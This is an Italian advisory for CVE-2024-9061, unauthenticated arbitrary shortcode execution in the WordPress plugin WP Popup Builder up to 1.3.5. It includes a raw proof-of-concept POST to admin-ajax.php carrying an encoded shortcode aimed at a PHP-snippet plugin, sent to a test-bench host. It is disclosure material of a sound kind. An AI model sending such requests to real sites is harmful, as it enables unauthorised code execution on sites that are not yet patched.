
WP Popup Builder – Moduli Popup e Generazione Lead di Marketing <= 1.3.5 - Esecuzione Arbitraria di Shortcode Non Autenticata tramite wp_ajax_nopriv_shortcode_Api_Add
WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Esecuzione Arbitraria di Shortcode Non Autenticata tramite wp_ajax_nopriv_shortcode_Api_Add
Il plugin WP Popup Builder – Popup Forms and Marketing Lead Generation per WordPress è vulnerabile all'esecuzione arbitraria di shortcode tramite l'azione AJAX wp_ajax_nopriv_shortcode_Api_Add in tutte le versioni fino alla 1.3.5 inclusa. Questo è dovuto al fatto che il software consente agli utenti di eseguire un'azione che non convalida correttamente un valore prima di eseguire do_shortcode. Ciò rende possibile per attaccanti non autenticati eseguire shortcode arbitrari. NOTA: Questa vulnerabilità è stata parzialmente corretta nella versione 1.3.5 con un controllo nonce, che ha effettivamente impedito l'accesso alla funzione interessata. Tuttavia, la versione 1.3.6 incorpora il corretto controllo di autorizzazione per prevenire accessi non autorizzati.
Avevo installato un altro plugin per l'esecuzione di PHP per questo, ma non sono mai riuscito a farlo eseguire.
[xyz-ips snippet="test"]
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Scarica [wp-popup-builder Versione 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive
action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
La risposta è un 200 vuoto.